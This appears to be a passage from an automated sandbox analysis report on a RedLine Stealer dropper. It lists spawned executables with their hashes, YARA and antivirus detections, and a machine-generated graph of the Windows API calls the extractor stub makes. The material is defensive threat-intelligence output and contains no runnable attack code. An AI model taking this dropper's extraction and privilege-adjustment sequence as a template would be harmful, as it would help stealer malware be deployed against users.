                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exe
                                                                                                                                                                                                                                            Imagebase:0xa80000
                                                                                                                                                                                                                                            File size:206848 bytes
                                                                                                                                                                                                                                            MD5 hash:156433A80D154CC7554D6D4E75C8E045
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000003.308397385.00000000045DD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                            • Detection: 64%, ReversingLabs
                                                                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                                                            Start time:06:58:19
                                                                                                                                                                                                                                            Start date:10/02/2023
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exe
                                                                                                                                                                                                                                            Imagebase:0x5e0000
                                                                                                                                                                                                                                            File size:11264 bytes
                                                                                                                                                                                                                                            MD5 hash:7E93BACBBC33E6652E147E7FE07572A0
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                            • Detection: 85%, ReversingLabs
                                                                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                                                                            Target ID:4
                                                                                                                                                                                                                                            Start time:06:58:26
                                                                                                                                                                                                                                            Start date:10/02/2023
                                                                                                                                                                                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                            Imagebase:0x7ff712260000
                                                                                                                                                                                                                                            File size:69632 bytes
                                                                                                                                                                                                                                            MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                                                            Target ID:5
                                                                                                                                                                                                                                            Start time:06:58:30
                                                                                                                                                                                                                                            Start date:10/02/2023
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe
                                                                                                                                                                                                                                            Imagebase:0x860000
                                                                                                                                                                                                                                            File size:179200 bytes
                                                                                                                                                                                                                                            MD5 hash:EF8079CF160510D0DA7162BC08F753D8
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000000.333078964.0000000000862000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe, Author: ditekSHen
                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                            • Detection: 96%, ReversingLabs
                                                                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                                                                            Target ID:6
                                                                                                                                                                                                                                            Start time:06:58:35
                                                                                                                                                                                                                                            Start date:10/02/2023
                                                                                                                                                                                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                                                            Imagebase:0x7ff712260000
                                                                                                                                                                                                                                            File size:69632 bytes
                                                                                                                                                                                                                                            MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                                                            Target ID:7
                                                                                                                                                                                                                                            Start time:06:58:43
                                                                                                                                                                                                                                            Start date:10/02/2023
                                                                                                                                                                                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                                                            Imagebase:0x7ff712260000
                                                                                                                                                                                                                                            File size:69632 bytes
                                                                                                                                                                                                                                            MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                              Execution Coverage:28.6%
                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                              Signature Coverage:28.2%
                                                                                                                                                                                                                                              Total number of Nodes:958
                                                                                                                                                                                                                                              Total number of Limit Nodes:24
                                                                                                                                                                                                                                              execution_graph 2196 974cd0 2197 974cf4 2196->2197 2198 974d0b 2196->2198 2199 974d02 2197->2199 2200 974b60 FindCloseChangeNotification 2197->2200 2198->2199 2201 974dcb 2198->2201 2206 974d25 2198->2206 2253 976ce0 2199->2253 2200->2199 2203 974dd4 SetDlgItemTextA 2201->2203 2205 974de3 2201->2205 2203->2205 2204 974e95 2205->2199 2227 97476d 2205->2227 2206->2199 2219 974c37 2206->2219 2209 974e38 2209->2199 2236 974980 2209->2236 2215 974e64 2244 9747e0 LocalAlloc 2215->2244 2218 974e6f 2218->2199 2220 974c88 2219->2220 2221 974c4c DosDateTimeToFileTime 2219->2221 2220->2199 2224 974b60 2220->2224 2221->2220 2222 974c5e LocalFileTimeToFileTime 2221->2222 2222->2220 2223 974c70 SetFileTime 2222->2223 2223->2220 2225 974b76 SetFileAttributesA 2224->2225 2226 974b92 FindCloseChangeNotification 2224->2226 2225->2199 2226->2225 2258 9766ae GetFileAttributesA 2227->2258 2229 97477b 2229->2209 2230 9747cc SetFileAttributesA 2232 9747db 2230->2232 2232->2209 2235 9747c2 2235->2230 2237 974990 2236->2237 2238 9749a5 2237->2238 2239 9749c2 lstrcmpA 2237->2239 2240 9744b9 20 API calls 2238->2240 2241 9749ba 2239->2241 2242 974a0e 2239->2242 2240->2241 2241->2199 2241->2215 2242->2241 2324 97487a 2242->2324 2245 9747f6 2244->2245 2246 97480f LocalAlloc 2244->2246 2247 9744b9 20 API calls 2245->2247 2249 974831 2246->2249 2252 97480b 2246->2252 2247->2252 2250 9744b9 20 API calls 2249->2250 2251 974846 LocalFree 2250->2251 2251->2252 2252->2218 2254 976ceb 2253->2254 2255 976ce8 2253->2255 2337 976cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2254->2337 2255->2204 2257 976e26 2257->2204 2259 974777 2258->2259 2259->2229 2259->2230 2260 976517 FindResourceA 2259->2260 2261 976536 LoadResource 2260->2261 2262 97656b 2260->2262 2261->2262 2263 976544 DialogBoxIndirectParamA FreeResource 2261->2263 2267 9744b9 2262->2267 2263->2262 2265 9747b1 2263->2265 2265->2230 2265->2232 2265->2235 2268 9744fe LoadStringA 2267->2268 2269 97455a 2267->2269 2270 974527 2268->2270 2271 974562 2268->2271 2272 976ce0 4 API calls 2269->2272 2273 97681f 10 API calls 2270->2273 2276 9745c9 2271->2276 2282 97457e LocalAlloc 2271->2282 2274 974689 2272->2274 2275 97452c 2273->2275 2274->2265 2277 974536 MessageBoxA 2275->2277 2308 9767c9 2275->2308 2278 974607 LocalAlloc 2276->2278 2279 9745cd LocalAlloc 2276->2279 2277->2269 2278->2269 2290 9745c4 2278->2290 2279->2269 2284 9745f3 2279->2284 2282->2269 2289 9745af 2282->2289 2287 97171e _vsnprintf 2284->2287 2285 97462d MessageBeep 2296 97681f 2285->2296 2287->2290 2314 97171e 2289->2314 2290->2285 2293 974645 MessageBoxA LocalFree 2293->2269 2295 9767c9 EnumResourceLanguagesA 2295->2293 2297 976857 GetVersionExA 2296->2297 2298 976940 2296->2298 2300 97687c 2297->2300 2307 97691a 2297->2307 2299 976ce0 4 API calls 2298->2299 2301 97463b 2299->2301 2302 9768a5 GetSystemMetrics 2300->2302 2300->2307 2301->2293 2301->2295 2303 9768b5 RegOpenKeyExA 2302->2303 2302->2307 2304 9768d6 RegQueryValueExA RegCloseKey 2303->2304 2303->2307 2305 97690c 2304->2305 2304->2307 2318 9766f9 2305->2318 2307->2298 2309 976803 2308->2309 2310 9767e2 2308->2310 2309->2277 2322 976793 EnumResourceLanguagesA 2310->2322 2312 9767f5 2312->2309 2323 976793 EnumResourceLanguagesA 2312->2323 2315 97172d 2314->2315 2316 97173d _vsnprintf 2315->2316 2317 97175d 2315->2317 2316->2317 2317->2290 2319 97670f 2318->2319 2320 976740 CharNextA 2319->2320 2321 97674b 2319->2321 2320->2319 2321->2307 2322->2312 2323->2309 2325 9748a2 CreateFileA 2324->2325 2327 9748e9 2325->2327 2328 974908 2325->2328 2327->2328 2329 9748ee 2327->2329 2328->2241 2332 97490c 2329->2332 2333 9748f5 CreateFileA 2332->2333 2334 974917 2332->2334 2333->2328 2334->2333 2335 974962 CharNextA 2334->2335 2336 974953 CreateDirectoryA 2334->2336 2335->2334 2336->2335 2337->2257 2338 974ad0 2346 973680 2338->2346 2341 974aee WriteFile 2343 974b14 2341->2343 2344 974b0f 2341->2344 2342 974ae9 2343->2344 2345 974b3b SendDlgItemMessageA 2343->2345 2345->2344 2347 973691 MsgWaitForMultipleObjects 2346->2347 2348 9736a9 PeekMessageA 2347->2348 2349 9736e8 2347->2349 2348->2347 2350 9736bc 2348->2350 2349->2341 2349->2342 2350->2347 2350->2349 2351 9736c7 DispatchMessageA 2350->2351 2352 9736d1 PeekMessageA 2350->2352 2351->2352 2352->2350 3119 973210 3120 973227 3119->3120 3121 97328e EndDialog 3119->3121 3122 973235 3120->3122 3123 9733e2 GetDesktopWindow 3120->3123 3137 973239 3121->3137 3127 9732dd GetDlgItemTextA 3122->3127 3128 97324c 3122->3128 3122->3137 3172 9743d0 6 API calls 3123->3172 3130 973366 3127->3130 3138 9732fc 3127->3138 3131 9732c5 EndDialog 3128->3131 3132 973251 3128->3132 3129 97341f GetDlgItem EnableWindow 3129->3137 3134 9744b9 20 API calls 3130->3134 3131->3137 3133 97325c LoadStringA 3132->3133 3132->3137 3135 973294 3133->3135 3136 97327b 3133->3136 3134->3137 3157 974224 LoadLibraryA 3135->3157 3141 9744b9 20 API calls 3136->3141 3138->3130 3140 973331 GetFileAttributesA 3138->3140 3143 97333f 3140->3143 3144 97337c 3140->3144 3141->3121 3147 9744b9 20 API calls 3143->3147 3146 97658a CharPrevA 3144->3146 3145 9732a5 SetDlgItemTextA 3145->3136 3145->3137 3148 97338d 3146->3148 3149 973351 3147->3149 3150 9758c8 27 API calls 3148->3150 3149->3137 3151 97335a CreateDirectoryA 3149->3151 3152 973394 3150->3152 3151->3130 3151->3144 3152->3130 3153 9733a4 3152->3153 3154 9733c7 EndDialog 3153->3154 3155 97597d 34 API calls 3153->3155 3154->3137 3156 9733c3 3155->3156 3156->3137 3156->3154 3158 974246 GetProcAddress 3157->3158 3159 9743b2 3157->3159 3160 9743a4 FreeLibrary 3158->3160 3161 97425d GetProcAddress 3158->3161 3163 9744b9 20 API calls 3159->3163 3160->3159 3161->3160 3162 974274 GetProcAddress 3161->3162 3162->3160 3164 97428b 3162->3164 3165 97329d 3163->3165 3166 974295 GetTempPathA 3164->3166 3171 9742e1 3164->3171 3165->3137 3165->3145 3167 9742ad 3166->3167 3167->3167 3168 9742b4 CharPrevA 3167->3168 3169 9742d0 CharPrevA 3168->3169 3168->3171 3169->3171 3170 974390 FreeLibrary 3170->3165 3171->3170 3174 974463 SetWindowPos 3172->3174 3175 976ce0 4 API calls 3174->3175 3176 9733f1 SetWindowTextA SendDlgItemMessageA 3175->3176 3176->3129 3176->3137 3177 974a50 3178 974a66 3177->3178 3179 974a9f ReadFile 3177->3179 3180 974a82 memcpy 3178->3180 3181 974abb 3178->3181 3179->3181 3180->3181 3182 973450 3183 9734d3 EndDialog 3182->3183 3184 97345e 3182->3184 3185 97346a 3183->3185 3186 97349a GetDesktopWindow 3184->3186 3190 973465 3184->3190 3187 9743d0 11 API calls 3186->3187 3188 9734ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3187->3188 3188->3185 3189 97348c EndDialog 3189->3185 3190->3185 3190->3189 3191 976c03 3192 976c17 _exit 3191->3192 3193 976c1e 3191->3193 3192->3193 3194 976c27 _cexit 3193->3194 3195 976c32 3193->3195 3194->3195 2353 974cc0 GlobalFree 2354 976f40 SetUnhandledExceptionFilter 3196 974bc0 3198 974c05 3196->3198 3199 974bd7 3196->3199 3197 974c1b SetFilePointer 3197->3199 3198->3197 3198->3199 3200 9730c0 3201 9730de CallWindowProcA 3200->3201 3202 9730ce 3200->3202 3203 9730da 3201->3203 3202->3201 3202->3203 3204 9763c0 3205 976407 3204->3205 3206 97658a CharPrevA 3205->3206 3207 976415 CreateFileA 3206->3207 3208 97643a 3207->3208 3209 976448 WriteFile 3207->3209 3212 976ce0 4 API calls 3208->3212 3210 976465 CloseHandle 3209->3210 3210->3208 3213 97648f 3212->3213 3214 973100 3215 9731b0 3214->3215 3216 973111 3214->3216 3217 973141 3215->3217 3218 9731b9 SendDlgItemMessageA 3215->3218 3219 97311d 3216->3219 3220 973149 GetDesktopWindow 3216->3220 3218->3217 3219->3217 3221 973138 EndDialog 3219->3221 3222 9743d0 11 API calls 3220->3222 3221->3217 3223 97315d 6 API calls 3222->3223 3223->3217 3224 974200 3225 97421e 3224->3225 3226 97420b SendMessageA 3224->3226 3226->3225 3227 9769b0 3228 9769b5 3227->3228 3236 976fbe GetModuleHandleW 3228->3236 3230 9769c1 __set_app_type __p__fmode __p__commode 3231 9769f9 3230->3231 3232 976a02 __setusermatherr 3231->3232 3233 976a0e 3231->3233 3232->3233 3238 9771ef _controlfp 3233->3238 3235 976a13 3237 976fcf 3236->3237 3237->3230 3238->3235 3239 9734f0 3240 973504 3239->3240 3241 9735b8 3239->3241 3240->3241 3242 9735be GetDesktopWindow 3240->3242 3243 97351b 3240->3243 3244 973526 3241->3244 3245 973671 EndDialog 3241->3245 3246 9743d0 11 API calls 3242->3246 3247 97354f 3243->3247 3248 97351f 3243->3248 3245->3244 3249 9735d6 3246->3249 3247->3244 3251 973559 ResetEvent 3247->3251 3248->3244 3250 97352d TerminateThread EndDialog 3248->3250 3252 9735e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3249->3252 3253 97361d SetWindowTextA CreateThread 3249->3253 3250->3244 3254 9744b9 20 API calls 3251->3254 3252->3253 3253->3244 3255 973646 3253->3255 3256 973581 3254->3256 3257 9744b9 20 API calls 3255->3257 3258 97359b SetEvent 3256->3258 3260 97358a SetEvent 3256->3260 3257->3241 3259 973680 4 API calls 3258->3259 3259->3241 3260->3244 3261 976ef0 3262 976f2d 3261->3262 3263 976f02 3261->3263 3263->3262 3264 976f27 ?terminate@ 3263->3264 3264->3262 3265 977270 _except_handler4_common 2355 974ca0 GlobalAlloc 2356 976a60 2373 977155 2356->2373 2358 976a65 2359 976a76 GetStartupInfoW 2358->2359 2360 976a93 2359->2360 2361 976aa8 2360->2361 2362 976aaf Sleep 2360->2362 2363 976ac7 _amsg_exit 2361->2363 2365 976ad1 2361->2365 2362->2360 2363->2365 2364 976b13 _initterm 2369 976b2e __IsNonwritableInCurrentImage 2364->2369 2365->2364 2366 976af4 2365->2366 2365->2369 2367 976bd6 _ismbblead 2367->2369 2368 976c1e 2368->2366 2371 976c27 _cexit 2368->2371 2369->2367 2369->2368 2372 976bbe exit 2369->2372 2378 972bfb GetVersion 2369->2378 2371->2366 2372->2369 2374 97717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2373->2374 2375 97717a 2373->2375 2377 9771cd 2374->2377 2375->2374 2376 9771e2 2375->2376 2376->2358 2377->2376 2379 972c50 2378->2379 2380 972c0f 2378->2380 2395 972caa memset memset memset 2379->2395 2380->2379 2381 972c13 GetModuleHandleW 2380->2381 2381->2379 2384 972c22 GetProcAddress 2381->2384 2384->2379 2391 972c34 2384->2391 2385 972c8e 2387 972c97 CloseHandle 2385->2387 2388 972c9e 2385->2388 2387->2388 2388->2369 2391->2379 2393 972c89 2489 971f90 2393->2489 2506 97468f FindResourceA SizeofResource 2395->2506 2398 972ef3 2401 9744b9 20 API calls 2398->2401 2399 972d2d CreateEventA SetEvent 2400 97468f 7 API calls 2399->2400 2402 972d57 2400->2402 2403 972d6e 2401->2403 2404 972d5b 2402->2404 2406 972e1f 2402->2406 2409 97468f 7 API calls 2402->2409 2407 976ce0 4 API calls 2403->2407 2405 9744b9 20 API calls 2404->2405 2405->2403 2511 975c9e 2406->2511 2410 972c62 2407->2410 2412 972d9f 2409->2412 2410->2385 2436 972f1d 2410->2436 2412->2404 2415 972da3 CreateMutexA 2412->2415 2413 972e30 2413->2398 2414 972e3a 2416 972e43 2414->2416 2417 972e52 FindResourceA 2414->2417 2415->2406 2418 972dbd GetLastError 2415->2418 2537 972390 2416->2537 2421 972e64 LoadResource 2417->2421 2422 972e6e 2417->2422 2418->2406 2420 972dca 2418->2420 2424 972dd5 2420->2424 2425 972dea 2420->2425 2421->2422 2423 972e4d 2422->2423 2552 9736ee GetVersionExA 2422->2552 2423->2403 2427 9744b9 20 API calls 2424->2427 2426 9744b9 20 API calls 2425->2426 2428 972dff 2426->2428 2430 972de8 2427->2430 2428->2406 2431 972e04 CloseHandle 2428->2431 2430->2431 2431->2403 2435 976517 24 API calls 2435->2423 2437 972f3f 2436->2437 2438 972f6c 2436->2438 2439 972f5f 2437->2439 2641 9751e5 2437->2641 2660 975164 2438->2660 2788 973a3f 2439->2788 2443 972f71 2472 97303c 2443->2472 2673 9755a0 2443->2673 2448 976ce0 4 API calls 2450 972c6b 2448->2450 2449 972f86 GetSystemDirectoryA 2451 97658a CharPrevA 2449->2451 2476 9752b6 2450->2476 2452 972fab LoadLibraryA 2451->2452 2453 972ff7 FreeLibrary 2452->2453 2454 972fc0 GetProcAddress 2452->2454 2456 973017 SetCurrentDirectoryA 2453->2456 2457 973006 2453->2457 2454->2453 2455 972fd6 DecryptFileA 2454->2455 2455->2453 2465 972ff0 2455->2465 2458 973026 2456->2458 2462 973054 2456->2462 2457->2456 2721 97621e GetWindowsDirectoryA 2457->2721 2459 9744b9 20 API calls 2458->2459 2464 973037 2459->2464 2461 973061 2467 97307a 2461->2467 2461->2472 2740 97256d 2461->2740 2462->2461 2731 973b26 2462->2731 2807 976285 GetLastError 2464->2807 2465->2453 2470 973098 2467->2470 2751 973ba2 2467->2751 2470->2472 2474 9730af 2470->2474 2472->2448 2809 974169 2474->2809 2477 975316 2476->2477 2478 9752d6 2476->2478 2482 975374 2477->2482 2486 97535e SetCurrentDirectoryA 2477->2486 2488 9765e8 4 API calls 2477->2488 2479 975300 LocalFree LocalFree 2478->2479 2481 9752eb SetFileAttributesA DeleteFileA 2478->2481 2479->2477 2479->2478 2480 97538c 2483 976ce0 4 API calls 2480->2483 2481->2479 2482->2480 3115 971fe1 2482->3115 2485 972c72 2483->2485 2485->2385 2485->2393 2487 972390 13 API calls 2486->2487 2487->2482 2488->2486 2490 971f9f 2489->2490 2491 971f9a 2489->2491 2493 971fc0 2490->2493 2496 9744b9 20 API calls 2490->2496 2497 971fd9 2490->2497 2492 971ea7 15 API calls 2491->2492 2492->2490 2494 971fcf ExitWindowsEx 2493->2494 2495 971ee2 GetCurrentProcess OpenProcessToken 2493->2495 2493->2497 2494->2497 2499 971f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2495->2499 2500 971f0e 2495->2500 2496->2493 2497->2385 2499->2500 2501 971f6b ExitWindowsEx 2499->2501 2503 9744b9 20 API calls 2500->2503 2501->2500 2502 971f1f 2501->2502 2504 976ce0 4 API calls 2502->2504 2503->2502 2505 971f8c 2504->2505 2505->2385 2507 9746b6 2506->2507 2509 972d1a 2506->2509 2508 9746be FindResourceA LoadResource LockResource 2507->2508 2507->2509 2508->2509 2510 9746df memcpy_s FreeResource 2508->2510 2509->2398 2509->2399 2510->2509 2517 975e17 2511->2517 2535 975cc3 2511->2535 2512 975dd0 2516 975dec GetModuleFileNameA 2512->2516 2512->2517 2513 976ce0 4 API calls 2515 972e2c 2513->2515 2514 975ced CharNextA 2514->2535 2515->2413 2515->2414 2516->2517 2518 975e0a 2516->2518 2517->2513 2587 9766c8 2518->2587 2520 976218 2596 976e2a 2520->2596 2523 975e36 CharUpperA 2524 9761d0 2523->2524 2523->2535 2525 9744b9 20 API calls 2524->2525 2526 9761e7 2525->2526 2527 9761f7 ExitProcess 2526->2527 2528 9761f0 CloseHandle 2526->2528 2528->2527 2529 975f9f CharUpperA 2529->2535 2530 975f59 CompareStringA 2530->2535 2531 976003 CharUpperA 2531->2535 2532 97667f IsDBCSLeadByte CharNextA 2532->2535 2533 975edc CharUpperA 2533->2535 2534 9760a2 CharUpperA 2534->2535 2535->2512 2535->2514 2535->2517 2535->2520 2535->2523 2535->2529 2535->2530 2535->2531 2535->2532 2535->2533 2535->2534 2592 97658a 2535->2592 2538 9724cb 2537->2538 2541 9723b9 2537->2541 2539 976ce0 4 API calls 2538->2539 2540 9724dc 2539->2540 2540->2423 2541->2538 2542 9723e9 FindFirstFileA 2541->2542 2542->2538 2543 972407 2542->2543 2544 972421 lstrcmpA 2543->2544 2545 972479 2543->2545 2547 9724a9 FindNextFileA 2543->2547 2550 97658a CharPrevA 2543->2550 2551 972390 5 API calls 2543->2551 2546 972431 lstrcmpA 2544->2546 2544->2547 2548 972488 SetFileAttributesA DeleteFileA 2545->2548 2546->2543 2546->2547 2547->2543 2549 9724bd FindClose RemoveDirectoryA 2547->2549 2548->2547 2549->2538 2550->2543 2551->2543 2556 973737 2552->2556 2558 97372d 2552->2558 2553 9744b9 20 API calls 2566 9739fc 2553->2566 2554 976ce0 4 API calls 2555 972e92 2554->2555 2555->2403 2555->2423 2567 9718a3 2555->2567 2556->2558 2559 9738a4 2556->2559 2556->2566 2603 9728e8 2556->2603 2558->2553 2558->2566 2559->2558 2560 9739c1 MessageBeep 2559->2560 2559->2566 2561 97681f 10 API calls 2560->2561 2562 9739ce 2561->2562 2563 9739d8 MessageBoxA 2562->2563 2565 9767c9 EnumResourceLanguagesA 2562->2565 2563->2566 2565->2563 2566->2554 2568 9718d5 2567->2568 2569 9719b8 2567->2569 2632 9717ee LoadLibraryA 2568->2632 2571 976ce0 4 API calls 2569->2571 2573 9719d5 2571->2573 2573->2423 2573->2435 2574 9718e5 GetCurrentProcess OpenProcessToken 2574->2569 2575 971900 GetTokenInformation 2574->2575 2576 9719aa CloseHandle 2575->2576 2577 971918 GetLastError 2575->2577 2576->2569 2577->2576 2578 971927 LocalAlloc 2577->2578 2579 9719a9 2578->2579 2580 971938 GetTokenInformation 2578->2580 2579->2576 2581 9719a2 LocalFree 2580->2581 2582 97194e AllocateAndInitializeSid 2580->2582 2581->2579 2582->2581 2585 97196e 2582->2585 2583 971999 FreeSid 2583->2581 2584 971975 EqualSid 2584->2585 2586 97198c 2584->2586 2585->2583 2585->2584 2585->2586 2586->2583 2588 9766d5 2587->2588 2589 9766f3 2588->2589 2591 9766e5 CharNextA 2588->2591 2599 976648 2588->2599 2589->2517 2591->2588 2593 97659b 2592->2593 2593->2593 2594 9765b8 CharPrevA 2593->2594 2595 9765ab 2593->2595 2594->2595 2595->2535 2602 976cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2596->2602 2598 97621d 2600 976668 2599->2600 2601 97665d IsDBCSLeadByte 2599->2601 2600->2588 2601->2600 2602->2598 2604 972a62 2603->2604 2608 97290d 2603->2608 2605 972a75 2604->2605 2606 972a6e GlobalFree 2604->2606 2605->2559 2606->2605 2608->2604 2609 972955 GlobalAlloc 2608->2609 2611 972a20 GlobalUnlock 2608->2611 2612 972a80 GlobalUnlock 2608->2612 2613 972773 2608->2613 2609->2604 2610 972968 GlobalLock 2609->2610 2610->2604 2610->2608 2611->2608 2612->2604 2614 9727a3 CharUpperA CharNextA CharNextA 2613->2614 2615 9728b2 2613->2615 2616 9728b7 GetSystemDirectoryA 2614->2616 2617 9727db 2614->2617 2615->2616 2620 9728bf 2616->2620 2618 9727e3 2617->2618 2619 9728a8 GetWindowsDirectoryA 2617->2619 2624 97658a CharPrevA 2618->2624 2619->2620 2621 9728d2 2620->2621 2622 97658a CharPrevA 2620->2622 2623 976ce0 4 API calls 2621->2623 2622->2621 2625 9728e2 2623->2625 2626 972810 RegOpenKeyExA 2624->2626 2625->2608 2626->2620 2627 972837 RegQueryValueExA 2626->2627 2628 97285c 2627->2628 2629 97289a RegCloseKey 2627->2629 2630 972867 ExpandEnvironmentStringsA 2628->2630 2631 97287a 2628->2631 2629->2620 2630->2631 2631->2629 2633 971826 GetProcAddress 2632->2633 2634 971890 2632->2634 2635 971889 FreeLibrary 2633->2635 2636 971839 AllocateAndInitializeSid 2633->2636 2637 976ce0 4 API calls 2634->2637 2635->2634 2636->2635 2640 97185f FreeSid 2636->2640 2638 97189f 2637->2638 2638->2569 2638->2574 2640->2635 2642 97468f 7 API calls 2641->2642 2643 9751f9 LocalAlloc 2642->2643 2644 97522d 2643->2644 2645 97520d 2643->2645 2647 97468f 7 API calls 2644->2647 2646 9744b9 20 API calls 2645->2646 2649 97521e 2646->2649 2648 97523a 2647->2648 2650 975262 lstrcmpA 2648->2650 2651 97523e 2648->2651 2652 976285 GetLastError 2649->2652 2654 975272 LocalFree 2650->2654 2655 97527e 2650->2655 2653 9744b9 20 API calls 2651->2653 2658 972f4d 2652->2658 2656 97524f LocalFree 2653->2656 2654->2658 2657 9744b9 20 API calls 2655->2657 2656->2658 2659 975290 LocalFree 2657->2659 2658->2438 2658->2439 2658->2472 2659->2658 2661 97468f 7 API calls 2660->2661 2662 975175 2661->2662 2663 97517a 2662->2663 2664 9751af 2662->2664 2666 9744b9 20 API calls 2663->2666 2665 97468f 7 API calls 2664->2665 2667 9751c0 2665->2667 2668 97518d 2666->2668 2822 976298 2667->2822 2668->2443 2671 9751e1 2671->2443 2672 9744b9 20 API calls 2672->2668 2674 97468f 7 API calls 2673->2674 2675 9755c7 LocalAlloc 2674->2675 2676 9755fd 2675->2676 2677 9755db 2675->2677 2678 97468f 7 API calls 2676->2678 2679 9744b9 20 API calls 2677->2679 2680 97560a 2678->2680 2681 9755ec 2679->2681 2682 975632 lstrcmpA 2680->2682 2683 97560e 2680->2683 2684 976285 GetLastError 2681->2684 2686 975645 2682->2686 2687 97564b LocalFree 2682->2687 2685 9744b9 20 API calls 2683->2685 2709 9755f1 2684->2709 2688 97561f LocalFree 2685->2688 2686->2687 2689 975696 2687->2689 2690 97565b 2687->2690 2688->2709 2691 97589f 2689->2691 2694 9756ae GetTempPathA 2689->2694 2698 975467 49 API calls 2690->2698 2692 976517 24 API calls 2691->2692 2692->2709 2693 976ce0 4 API calls 2695 972f7e 2693->2695 2696 9756eb 2694->2696 2697 9756c3 2694->2697 2695->2449 2695->2472 2703 975717 GetDriveTypeA 2696->2703 2704 97586c GetWindowsDirectoryA 2696->2704 2696->2709 2834 975467 2697->2834 2700 975678 2698->2700 2702 9744b9 20 API calls 2700->2702 2700->2709 2702->2709 2705 975730 GetFileAttributesA 2703->2705 2719 97572b 2703->2719 2868 97597d GetCurrentDirectoryA SetCurrentDirectoryA 2704->2868 2705->2719 2709->2693 2710 975467 49 API calls 2710->2696 2711 972630 21 API calls 2711->2719 2713 9757c1 GetWindowsDirectoryA 2713->2719 2714 97597d 34 API calls 2714->2719 2715 97658a 